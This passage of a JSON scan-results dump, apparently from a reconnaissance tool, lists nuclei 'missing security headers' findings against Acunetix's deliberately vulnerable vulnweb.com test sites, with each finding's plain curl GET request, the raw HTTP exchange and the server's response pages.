Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 374, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:40:57.280Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 375, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:40:57.419Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 376, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:40:57.570Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 377, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:40:57.723Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 378, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:40:57.856Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 379, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:40:57.990Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 380, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:40:58.151Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 381, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:40:58.286Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 382, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:40:58.416Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 383, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:40:58.557Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 384, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:40:58.679Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 385, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:40:58.810Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 386, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": 